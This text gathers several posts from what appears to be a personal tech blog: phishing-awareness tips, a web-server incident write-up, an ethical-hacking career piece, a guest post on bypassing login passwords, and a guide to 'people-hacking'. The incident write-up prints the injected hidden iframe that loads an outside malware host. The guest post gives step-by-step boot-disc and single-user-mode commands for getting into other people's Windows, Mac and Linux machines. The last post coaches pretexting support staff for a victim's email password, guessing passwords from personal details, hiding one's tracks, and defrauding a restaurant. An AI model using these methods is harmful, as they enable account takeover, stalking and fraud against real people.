Social Engineering And Phishing

Phishing is the act of fishing for sensitive information from a target. This is usually done by baiting the hook with either something very tempting or a sense of urgent attention needed to something they value. Social Engineering is the art of getting someone to do what you want using only creative manipulation. Phishing is more closely associated with fraud and illegal activities. Social Engineering can be used in Phishing and hacking, but is also useful in many legal and morally neutral situations.

Examples of phishing largely include those fake bank and PayPal emails everyone eventually gets. Usually, the email will report that they are upgrading security or that your account is frozen (or in danger of being frozen). The quality of the email lends to how believable it is and can vary widely, but the goal is always the same. The sender wants you to feel the urgency to log into your account to prevent a threatened interruption in your access to your money. Similarly, you may have seen emails, seemingly from Facebook, telling you that you need to log in to keep your account open or for some other immediate reason. Don’t narrow your suspicion to just these examples, though. This type of bait email can apply to anything from your banking site to your Amazon wish list. Phishing isn’t just for a username and password, either. The rule of thumb is that any piece of information (or pieces in combination) that should be considered sensitive should be guarded carefully and you should think twice before giving anyone this information.

Social Engineering is a little broader in concept, but is just as important to be aware of. In fact, it may be more important to think about because your web browser can’t warn you about something suspicious when someone calls you on the phone and has a trick up their sleeve. Social Engineering relies heavily on perception and the target’s openness to trust that perception. For example, if a scammer calls you, sounding very professional and polite, and wants to confirm account information for your PayPal account, they are creating the perception that they are already in posission of your sensitive information and that you shouldn’t worry about giving them any of it.

Luring you in with something tempting is another trick people use all the time, and it’s one I fell for once, as careful as I usually am. It may be something as simple as information about who’s viewing your Facebook profile or it could be something as tempting as a free iPad. Either way, these scams attempt to trick you into giving your account credentials, signing up for a spammy Facebook group, or emailing a link to all your friends or worse. In my case it was worse, but I’ll share that below.

How To Spot A Scam

The sad fact is that nobody can truly spot every scam. Sadder still, is that most people don’t even think about it and could easily spot scams if they did. For scams we can’t spot, there are some rules to live by below, but for those we can spot, there’s some easy things to look for.

The number one thing I always ask myself is “Did I expect this email/message/phone call?” If receive any form of communication, that I didn’t expect, claiming to be from my bank or anywhere that might need sensitive information confirmed in order to discuss my account, I become immediately suspicious. About 95% of the time, I’m right and it’s a phishing attempt or a scam of some kind.

Who was the email sent to and who was it from? An alarming number of people don’t pay any attention to this, assuming that the email designed to look like it came from Bank of Arizona actually did. Sometimes, you can see the suspicious email easily and other times you may need to “View All Headers” in your email program to see the details. In GMail, you simply hold your mouse over your name or the sender’s name. When you can’t see who the email is to or from, it’s best to defer to the Rules to Live By below. This applies to phone calls as well. If my cell phone rings and I don’t recognize the number, it goes to voicemail. Any reputable company or person worth calling back will leave a message. No message = no call back from me.

With any unexpected contact, ask yourself what the end goal is. Usually, you can elevate your suspicion depending on the apparent goal of the communication. For example, if asked to log in somewhere or to reply with your phone number, name, address, and birth date, you should be pretty suspicious. On the other hand, if an email just says “Welcome to Bank of Arizona” and doesn’t prompt you for any action at all, it’d probably pretty safe.

Even If It Doesn’t Look Or Walk Like A Duck

Sometimes, we just assume that scams are obvious when we’ve fallen for them because our Facerbook accounts get hacked or our bank accounts get drained. Unfortunately, not all scams look like scams, even after you’ve fallen for them. My wife and I came upon a couple great reminders of this while searching for a new place to live recently.

While looking on Craigslist for a house to rent, Michelle found a house that was listed for about half the monthly rent she’d expect. Curious, she searched for the address on Google and found it listed by a realty company in several places with a more realistic rent requirement. The realtor confirmed that the Craigslist ad was not posted by them. The most likely scenario is that someone responds to the ad, eventually paying deposits and first month’s rent only to find that the key doesn’t work in the lock.

Later, Michelle found another home listed for a too-good-to-be-true price and emailed to inquire about the exact location and how we could drop by for a walk-through. The response she received indicated that the owner was worried about dealing with strangers on Craigslist and could only arrange a walk-through and give out the exact address after a potential renter got a credit check at a site that the email linked to. Although the credit check site is legit, the scam is that there’s no home to rent. If we get the credit check, the person who listed the ad gets a referral commission and would probably then email and say that the house had been rented or some other excuse. This type of scam happens all the time with domain sales… “I want to buy your domain name, but I need to you get it appraised at this site first.” I recognized it right away, having seen it when selling domains, but I imagine a lot of people fell for it and still don’t know they were scammed.

Rules To Live By

I’ve been online since Yahoo was just a couple hundred links organized by a couple guys in a dorm room, and in my time online, I’ve developed some rules that I live by to help keep me out of trouble. While these rules help me avoid phishing scams, they have also helped in keeping viruses away from my computer and I think they’re just good rules to live by, if just a little paranoid.

1. If I don’t expect it, I don’t trust it. I touched on this above, but I think it’s the number one defense I live by, so I’ll mention it again. If you get an email from someone and it has a file in it, call them and ask. If really is the “funniest think [they've] ever seen”, they’ll get to enjoy your laughter over the phone. If it’s an email from your bank, PayPal, Facebook, Ebay, etc. just go to a browser and manually type in the URL or use your existing bookmark. This way, you’re sure you’re on the real site and if it really is important, you’ll probably have a notification in your account, too. It’s when you just blindly trust everything that comes your way that you open yourself up to scams.

2. Look at the URL. Most of the phishing emails I see would have you click on a link to log in somewhere. While I don’t think you should ever click on an email link to log in to an account, some links are just way easier to click. For these, don’t just look at what’s on the surface. Mouse over the link and see what the real URL is. Watch out for domains like login.facebook.com.ru or www.bankofarizona.com.cn. As clever as these face domains are, they’re easy enough to spot if you take a second to look.

3. Use the tools available to you. Use anti-virus software and malware detection. You wouldn’t leave your car unlocked with your wallet in it, would you? You shouldn’t leave your computer wide open to this stuff. There’s even free anti-virus software out there and most modern browsers will warn you if you try to visit a site that they deem suspicious. Listen to your browser and your instincts.

4. If it looks too good to be true… You know the saying. “If it looks too good to be true, it probably is.” To be fair, the occasional internet goodies are out there. I have gotten free iPods and PlayStations before, but most of the time, those things are scams. Don’t be so greedy that you dive in head first without looking. Weigh what you have to do and information you have to give against the prize. Aside from contests, nothing is truly free. If the promise is for an iPad with no signing up friends, no purchase and no random drawings, it’s probably a scam.

Damage Control

You are not perfect. Chances are that one day, you’ll slip and give someone what they’re phishing for. I did. I feel a little dumb even admitting it, but I once gave out my debit card pin online in response to an email that I’d won an XBox and just had to cover the shipping myself. I have my rules, I can usually see scams, and I think I’m pretty smart. Still, I got suckered in, thinking I’d won and getting excited at the idea of a free game system. As bad as that is, it could have been worse. I could have just prayed nothing would happen, hoping to avoid having to cancel a card or I could have been too embarrassed to call my bank. Instead, as embarrassed as I was, I called my bank only minutes after sending the email and admitted that I’d been suckered and needed to cancel the card. I felt really dumb, but more importantly, I felt relieved that I had reversed the problem quickly by canceling my card.

If you get scammed, don’t let your pride get in the way of the damage control.

Help Others

The internet is a giant community. When you see scams, report them. I always forward phishing emails to the real companies the email is disguised as. They have incredible incentive to go after the scammers and usually do. Don’t stop there, either. Most of you have a lot of friends online. Let them know about any phishing scams going around. I’d rather a friend be quietly aware of scams than hear that they fell for one I could have warned about.

On that note, use the comment form below to tell us about scams you’ve come across or any tips you have for staying safe online. And don’t forget to “Share” and “Like” this article on Facebook.

Related posts:

1. What Is Phishing And How To Avoid Online Scams
2. How to Avoid Falling Victim to Email Fraud
3. You’re being watched

Related posts brought to you by Yet Another Related Posts Plugin.

Discovering a problem
A client called, complaining that the content management system we built for them was not working properly, so one of the developers took a look at the code and immediately alerted me to a problem. When he looked at the code, he discovered two extra lines at the end. The lines were similar to the following and existed at the bottom of every index.php file in the site:

<iframe src=”http: //lotmachinesguide .cn/ in.cgi?income56″ width=1 height=1 style=”visibility: hidden”></iframe>

My first thought was that someone hacked in and changed the files. What about the rest of the server? This is where you get that sick feeling in your stomach and hope it’s not as bad as it could be. I emailed my wife and told her I’d be unavailable via phone/email/etc. for the next few hours.

Finding the cause
Tracking down the source of a hack or code injection like this can often be tricky. How tricky it is depends on your individual skill set, past experiences, and the complexity of the problem, itself. This one turned out to be easy, partially because I’ve done this before and know many of the places to look, but mostly because it wasn’t really a hack. Not locally, anyway. One of my developers and I sat down in my office and I started looking at the hacked files. Using the following command (from the client’s web root), I displayed a list of all files that were modified that day:

ls -laR |grep "Apr 24"

What it returned was a list of the index files I was already aware of. Good. I then ran the same command on other sites to be sure this was isolated and it was. Next, I checked “last” to see who’s been logging into my server:

last |grep [client username redacted] |grep Apr

Last shows all the recent logins from SSH, FTP, etc. Immediately, I noted a large number of FTP connections for the client site I was investigating, which looked suspicious. I headed to my FTP log files and grepped my “secure” log files for “Incorrect”:

grep Incorrect /var/log/secure*

Your system may use something other than “Incorrect” to indicate a bad login and your “secure” log file location may vary. This grep showed only a few bad attempts, which is fairly normal and not what I expected to see if the account had been brute-forced. I moved on to the FTP log file to see what transfers were made. You’ll need to find your own FTP log location if you don’t know where it is already.

grep "Apr 24" xferlog*

I did this mostly to confirm that I was on the right track, but it uncovered even more oddness. Here’s a bit of what I saw:

Fri Apr 24 11:17:32 2009 0 [ip redacted] 4289 /var/www/vhosts/[domain redacted]/httpdocs/index.php a _ o r [username redacted] ftp 0 * c
Fri Apr 24 11:17:38 2009 2 [ip redacted] 4402 /var/www/vhosts/[domain redacted]/httpdocs/index.php a _ i r [username redacted] ftp 0 * c
Fri Apr 24 11:17:51 2009 0 [ip redacted] 2836 /var/www/vhosts/[domain redacted]/httpdocs/admin/index.php a _ o r [username redacted] ftp 0 * c
Fri Apr 24 11:17:56 2009 0 [ip redacted] 2949 /var/www/vhosts/[domain redacted]/httpdocs/admin/index.php a _ i r [username redacted] ftp 0 * c

For each index file that had the iframe HTML added to the end, there was a download and then an upload five or six seconds later. The speed indicated that it was a script and the fact that it was all done via FTP indicated that if there was a compromised computer somewhere, it was remote and my server was safe.

Cleaning it all up
In this case, cleanup was easy. First, I backed up all the log files for further review just in case I need them. Then I changed the client’s FTP password. Finally, I pulled the latest (clean) versions of the affected index.php files from our subversion repository and uploaded them back to the site.

Preventing future occurrences
I wanted to find out exactly how someone who should clearly not have the client’s FTP credentials wound up with them. My theory was that the client’s computer had been compromised. I headed to arin.net and used their handy IP whois tool to see who the one prominent IP address from the log files belonged to. It turned out to be a COX IP registered to Atlanta, GA. We called the client and asked them if they had anyone there. They did not. The FTP logs also showed uploads, recently, of files documents that related to the client and looked to be legitimate, so we asked who uploaded them and conferenced him in. A couple questions quickly revealed that not only was the IP their local office computers, but the computers there had been “acting funny, randomly rebooting, etc.” for the last day or so. We sent their computer guy out to take care of the problem, which turned out to be a trojan.

Conclusions
First of all, this was a very easy problem to diagnose and fix. I’ve been on the bad end of some serious hacks and this was by no means a bad one. For the client, however, the day proved much more frustrating. The expense incurred from having the IT guy come out and the thought that it could have been much worse (like their site replaced with something untoward), should be a lesson to be very careful about what you download, what you click, and the sites you visit. The best policy is to only open or run things from sites and people you trust, and even then, use caution.

Related posts:

1. How to Move a Web Site with Minimal Down Time
2. Cool Trick: Edit Any Web Site In Any Browser
3. Codero’s Web Site Gets A Refresh

Related posts brought to you by Yet Another Related Posts Plugin.

Ethical Hacking
There’s a couple different ways to think about what hacking means. To some people, it’s just seedy characters in seedy places trying to break into your computer and steal your identity. While there’s people out there who do things like that, it’s not the true definition of a hacker. A hacker is someone who thinks outside the box to obtain information and learn new things that is normally unavailable via popular channels. That said, bad hackers are out there, but there is such a thing as Ethical Hacking. Since the EC-Council site does such a good job explaining ethical hacking, I’ll let them tell you in their own words:

The goal of the ethical hacker is to help the organization take preemptive measures against malicious attacks by attacking the system himself; all the while staying within legal limits.

It’s important to note that Ethical Hacking can be learned on your own, but it’s a slow road. Besides, a Certified Ethical Hacker is bound to have better odds making more money. Friends of mine have done this as teams or solo projects and if you’re good, it pays well and is a lot of fun. Now, the pay is better than ever, even in our economy. According to a recent article on CIO.com, the pay for an ethical hacker is up 40%. One of my friends was flown to Japan to hack in to a large company’s network and make a dramatic point about their security needs by walking into a security needs meeting in a highly secured part of the building using only his skills to gain access. “You should have seen their faces”, he told me with a big grin. Speaking for the other side, I manage several servers myself and I can tell you it’s a lot cheaper to pay someone to find all the holes than it is to clean up the mess that an unethical hacker can leave if you don’t.

Roles in IT Security
What if you don’t think hacking is for you? Hacking is rewarding, but there are other IT Security roles that can also be very rewarding and they all pay well. Some of these include pro-active positions like Security Awareness, Security Fundamentals, Advanced Penetration Testing and Application Security as well as some more re-active roles like Disaster Recovery (be the hero), and Computer Forensics (see my post tomorrow for a great real-life example of this from what I dealt with today).

One thing many online classes seem to miss is that a lot of people benefit vastly from the interaction with an actual instructor that a class room environment offers. These guys know that better learning comes from the ability to talk to a real live instructor and get detailed answers to unique and specific questions. They give you access to a real person to help you along as you go.

It’s really a good looking package and I just have to pound the point home… Ethical hacking and IT security is just plain rewarding financially as well as in every other way. If you’re thinking about a career in IT, you should look into this.

Related posts:

1. How to Hack a Person
2. Gawker Media Hack Is A Password Reminder
3. OMG! Ashley Marc James is a Virus!!!

Related posts brought to you by Yet Another Related Posts Plugin.

This guest post was written by Blair Mathis from LaptopLogic.com – your premier source for the latest laptop software news and best laptop accessories.

Computer passwords are like locks on doors – they keep honest people honest. If someone wishes to gain access to your laptop or computer, a simple login password will not stop them. Most computer users do not realize how simple it is to access the login password for a computer, and end up leaving vulnerable data on their computer, unencrypted and easy to access.

Are you curious how easy it is for someone to gain access to your computer? If so, read on to see the technique one might use to figure out your computer password.

Windows
Windows is still the most popular operating system, and the method used to discover the login password is the easiest. The program used is called Ophcrack, and it is free. Ophcrack is based on Slackware, and uses rainbow tables to solve passwords up to 14 characters in length. The time required to solve a password? Generally 10 seconds. The expertise needed? None.

Simply download the Ophcrack ISO and burn it to a CD (or load it onto a USB drive via UNetbootin). Insert the CD into a machine you would like to gain access to, then press and hold the power button until the computer shuts down. Turn the computer back on and enter BIOS at startup. Change the boot sequence to CD before HDD, then save and exit.

The computer will restart and Ophcrack will be loaded. Sit back and watch as it does all the work for your. Write down the password it gives you, remove the disc, restart the computer, and log in as if it were you own machine.

Mac
The second most popular operating system, OS X is no safer when it comes to password cracking then Windows.

The easiest method would be to use Ophcrack on this, also, as it works with Mac and Linux in addition to Windows. However, there are other methods that can be used, as demonstrated below.

If the Mac runs OS X 10.4, then you only need the installation CD. Insert it into the computer, reboot. When it starts up, select UTILITIES > RESET PASSWORD. Choose a new password and then use that to log in.

If the Mac runs OS X 10.5, restart the computer and press COMMAND + S. When at the prompt, type:

fsck -fy

mount -uw /

launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist

dscl . -passwd /Users/UserName newpassword

That’s it. Now that the password is reset, you can login.

Linux
Finally, there is Linux, an operating system quickly gaining popularity in mainstream, but not so common you’re likely to come across it. Though Mac and Linux are both based on Unix, it is easier to change the password in Linux than it is OS X.

To change the password, turn on the computer and press the ESC key when GRUB appears. Scroll down and highlight ‘Recovery Mode’ and press the ‘B’ key; this will cause you to enter ‘Single User Mode’.

You’re now at the prompt, and logged in as ‘root’ by default. Type ‘passwd’ and then choose a new password. This will change the root password to whatever you enter. If you’re interested in only gaining access to a single account on the system, however, then type ‘passwd username’ replacing ‘username’ with the login name for the account you would like to alter the password for.

Conclusion
There you have it – that is how simple it is for someone to hack your password. It requires no technical skills, no laborious tasks, only simple words or programs. The moral of the story? Encrypt your data to keep it safe. Don’t use only a password, but actually encryption, such as Blowfish or AES-128. There are a number of programs that can do this – TrueCrypt for Windows, or the native encryption found on Ubuntu, creating a disk image in Mac, etc.

Related posts:

1. Gawker Media Hack Is A Password Reminder
2. How To Reset Your Password on Vista with the Help of a USB Flash Drive
3. How To Crack PDF Passwords In Your Sleep

Related posts brought to you by Yet Another Related Posts Plugin.

Get to know your mark
A mark is simply the victim of your information theft. While you may have valid, legal, motives for sneaking around normal channels, I’ll refer to the target as your “mark” because I’m lazy.

Social engineering often involves pretending to be someone you are not. Many times, you may need to pretend to be a client, for example, in order to get their password from their domain registrar or internet service provider. You may have other, more sinister, motives for gathering sensitive data, too. Either way, you will need to be prepared with answers to key questions, appropriate reactions, etc. Research all the information you can about whatever you are trying to get access to as well as the person you are claiming to be (where applicable). For example, if you were to call a large ISP, attempting to get the password to your mark’s email account, you would want to know his or her full name, email address, and birth date at a minimum. Other helpful things to know are names of the girl/boyfriend, spouse, child, pet, etc., hobbies, bands or stars the person likes, and anything else very personal. More often than not, one of these things is the answer to your mark’s “hint” question, that question they ask you before divulging your password when you’ve forgotten it. Sometimes, that one word is all you need.

Some alarming facts
Around 2-4% of all people have a password of “password” or a pin/security code of “1234″. Many of the rest have passwords that can be found in a dictionary file (a file full of dictionary words used for guessing a password randomly). If your mark is 16 and her boyfriend is named Mark (but she calls him “markypoo” all over her MySpace page), you might be able to skip all the dirty work by just trying “mark”, “markypoo”, “ilovemark”, or “ilovemarkypoo” as her password. Just about every demographic seems to fall under the rule that you can usually guess a password within about 20 tries if you get to know the owner of the account. Some more clues that can help are birth dates, nicknames, sports teams, and movie/tv charaters. Know your mark (above) and the rest is pretty easy.

Get to know your source
When I say “source”, I mean the source of your information. This could be anything from an automated web form to a phone support representative, to a front desk employee at a hotel. The type of information you are looking for should dictate what your source is and is should be fairly obvious to you. Pretend, for a second, that you’re looking for that email password from above. Logic dictates that your source is going to the your mark’s ISP. Become a customer, client, or user. Sign up for an email account of your own and make note of the security questions. Test the password entry form and see if it has a minimum/maximum amount of characters or has any other requirements. Does the site suggest a username for you like Yahoo! does (eg: JohnDoe2008)? Any information you can glean through creative and thoughtful experimentation can be instrumental in your success.

Confidence is key
You’ve probably heard that before, but in another context. It’s a popular phrase when talking about sales or success in business. Confidence can drive your job interview home, it can get you sales, and it can even get you a date, but it can also be the key ingredient when trying to con a source out of information. If you act nervous in your efforts, it will likely get noticed and make your source suspicious. Speak clearly, act casual, and act like you’re supposed to get the information you’re asking for. Many times, you can even act as if you were waiting for a third party (whose name you now forget) to call you back with that information. Begin a support call by saying “I somehow got disconnected. I called in because I forgot my password and I forget who I spoke to, but he asked me the security questions and then the call dropped.” If you gently suggest to your source that another person in the company trusted your authority to access a password and was about to give it to you, this will sometimes lower their guard just enough to squeak by.

Confident does not mean sloppy
Sometimes you are acting in the best interest of someone who knows what you’re doing, but what if you’re just trying to snoop through someone’s email or you want to throw a surprise party for someone and just need to grab their contact list from their gmail account? If you don’t want anyone to know what you’re doing, you had better not leave a trail behind you. Getting caught can be embarrassing and get you into trouble with your mark. Worse, if you’re doing what I think you shouldn’t be, you could get jail time. That said, here’s some things to think about before you begin:

• - Don’t use your real name… anywhere
• - If using the phone, block your number
• - If using the web, go through a proxy (from a library)
• - If using email, get a throwaway email account and check via web mail (from the library)
• - Know the legality of what you’re planning
• - Try not to break the law if possible

The more careful you are, the less you have to worry about, and the more confident you can be when faced with the human interaction.

Get more than information
People-hacking works for more than just snooping on your ex-girlfriend’s email (stop obsessing and get over her). You can also work out discounts and deals by knowing how to deal with a particular source. Here’s an easy experiment you can do: Call a fast food joint on a weekday afternoon (right during the busy lunch time) and explain that your order was messed up. Your complaint should be believable, but bad enough that your meal was practically not edible to you. Say they put ketchup on your burger after you asked for no ketchup. Know ahead of time what you ordered (a popular combo meal will probably have been ordered in the last hour by someone at the drive-thru, making it more plausible). Almost every time, they will write down your first name (which can be any name you want to give them). The next day, show up and explain that you were told you would get a complimentary meal for the one they messed up. Give them the name you gave over the phone, order the same meal, and enjoy eating for free. I can’t publicly condone doing this, so if you happen to try it for the purpose of experimentation, even the score by donating $6 to charity or something.

There are many morally valid and many morally corrupt reasons for needing to obtain information, goods, or services via unconventional means like social engineering. Whatever your reason, identify what you want, plan it out, and go get it.

Related posts:

1. Gawker Media Hack Is A Password Reminder
2. Real Life SIMS: Control a Live Person Via the Web
3. Get Paid To Hack

Related posts brought to you by Yet Another Related Posts Plugin.